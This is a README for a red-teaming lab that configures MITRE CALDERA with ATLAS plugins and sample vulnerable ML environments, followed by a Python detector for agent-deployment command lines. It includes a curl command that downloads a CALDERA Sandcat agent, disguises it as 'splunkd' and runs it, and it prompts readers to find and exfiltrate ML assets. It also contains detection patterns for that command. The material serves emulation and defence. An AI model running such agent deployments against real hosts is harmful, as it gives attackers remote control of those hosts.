This repository brings together several projects to enable adversary emulation and red-teaming of machine learning (ML) systems. It configures the MITRE CALDERA™ docker image with MITRE ATLAS™ plugins and provides sample ML services and environments for testing.
If you want to jump right in and get hands-on, run the quick start demo script.
CALDERA is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
MITRE ATLAS (The Adversarial Threat Landscape for AI Systems) is a knowledge base of adversary tactics, techniques, and procedures targeting ML systems.
Included ATLAS CALDERA plugins: Almanac and Arsenal.

ML-Vulhub is a collection of scripts for instantiating ML-related services and modeling ML environments.
Clone the repo:

```bash
git clone --recursive git@github.com:mitre-atlas/caldera-atlas.git
cd caldera-atlas
```
Build the CALDERA docker image:

```bash
docker-compose build
```
Run the CALDERA docker image with the ATLAS plugins (almanac and arsenal):

```bash
docker-compose up -d
```
Access the CALDERA interface at localhost. The default username/password is admin/admin.
If you aren't already familiar with CALDERA, start with the CALDERA documentation.
The Almanac and Arsenal plugins can be accessed under the Plugins heading on the left-hand navigation menu.
Arsenal populates CALDERA with new Abilities that implement ATLAS techniques. It also adds new Adversary Profiles that use ATLAS techniques to target ML services and resources. More information is available in the Arsenal documentation.

To stop CALDERA:

```bash
docker-compose down
```
ML-Vulhub is a companion project that provides sample ML-enabled services and environments. This example models a compromised ML developer machine that has access to a private s3 bucket containing a model zoo and an internal ML model served with torchserve.

1. Start up CALDERA if it's not already running:

```bash
docker-compose up -d
```

2. Start a test environment from an example on ML VulHub:

```bash
cd ml-vulhub/envs/example-00-ml-dev
docker-compose build
./init.sh
docker-compose up -d
```

3. Launch a Sandcat agent on the mldev container:

```bash
docker-compose exec mldev bash -c 'server=http://host.docker.internal:8888; curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download -o splunkd; chmod u+x splunkd; ./splunkd -server $server -group red -v'
```
What ML assets can you discover and exfiltrate? What ML services can you discover, target, and attack?
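The Sandcat launch command above is also what a blue team monitoring the mldev host would see in its process telemetry. As an added example (not part of this repository or of CALDERA), the following Python snippet runs simple detection logic over a few constructed process-execution records: it flags the `file:sandcat.go` download header, a `/file/download` request carrying a `platform:` header, and the generic "curl to a file, chmod, then run it with `-server`" pattern within a single command line. The record format and the sample command lines are assumptions made up for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-execution records, one shell invocation each.
# They are made up for this example; they are not real CALDERA or ml-vulhub logs.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "mldev", "user": "root",
     "cmdline": """bash -c 'server=http://host.docker.internal:8888; curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download -o splunkd; chmod u+x splunkd; ./splunkd -server $server -group red -v'"""},
    {"host": "mldev", "user": "dev",
     "cmdline": "curl -s https://example.invalid/model.pt -o model.pt"},
    {"host": "mldev", "user": "dev",
     "cmdline": "bash -c 'curl -s -o agent http://10.0.0.5/file/download; chmod +x agent; ./agent -server http://10.0.0.5:8888 -group blue'"},
    {"host": "mldev", "user": "dev",
     "cmdline": "torchserve --start --model-store model_store"},
]

# Header CALDERA's stock deploy command uses to request the Sandcat binary.
SANDCAT_HEADER = re.compile(r'-H\s*["\']?file:sandcat\.go', re.IGNORECASE)
# Agent download endpoint paired with a platform selector header.
DOWNLOAD_ENDPOINT = re.compile(r"/file/download\b")
PLATFORM_HEADER = re.compile(r'-H\s*["\']?platform:', re.IGNORECASE)
# curl writing to a file: capture the output filename given to -o.
CURL_OUTPUT = re.compile(r"curl\b[^;&|]*?\s-o\s+([^\s;&|]+)")


def _download_then_exec(cmd: str) -> Optional[str]:
    """Return the filename if a curl-downloaded file is later executed with -server."""
    for m in CURL_OUTPUT.finditer(cmd):
        name = m.group(1).strip("'\"")
        # Look only at the part of the command after the download for ./<name> ... -server
        tail = cmd[m.end():]
        exec_pattern = r"(?:^|[;&|]\s*)\./" + re.escape(name) + r"\b[^;&|]*-server\b"
        if re.search(exec_pattern, tail):
            return name
    return None


def analyze(event: Dict[str, str]) -> List[str]:
    """Return the list of reasons a single command line looks like an agent deployment."""
    cmd = event["cmdline"]
    reasons: List[str] = []
    if SANDCAT_HEADER.search(cmd):
        reasons.append("curl sends the 'file:sandcat.go' header used to fetch the CALDERA Sandcat agent")
    if DOWNLOAD_ENDPOINT.search(cmd) and PLATFORM_HEADER.search(cmd):
        reasons.append("request to a /file/download endpoint with a 'platform:' header")
    name = _download_then_exec(cmd)
    if name:
        reasons.append(f"downloaded file '{name}' is executed with a -server argument in the same command")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run analyze() over all events and keep only those with at least one finding."""
    findings = []
    for event in events:
        reasons = analyze(event)
        if reasons:
            findings.append({"host": event["host"], "user": event["user"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding['host']} ({finding['user']}):")
        for reason in finding["reasons"]:
            print(f"  - {reason}")
```

The first sample trips all three checks; the third trips only the generic download-then-execute check, which is the one that survives an operator renaming the binary or the header, so it is the rule worth keeping even though it will need tuning against legitimate installer scripts on a real developer host.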
To shut down, run `docker-compose down` from both the `caldera-atlas` and `ml-vulhub/envs/example-00-ml-dev` directories.

The provided `demo.sh` script is a "one-click" script to set up CALDERA with ATLAS plugins and a sample target environment for adversary emulation and red-teaming.
This will:

- set up the `caldera` app and start the server in a `tmux` session
- enable the `arsenal` and `almanac` plugins
- start the `ml-vulhub` sample target environment
Run:

```bash
./demo.sh
```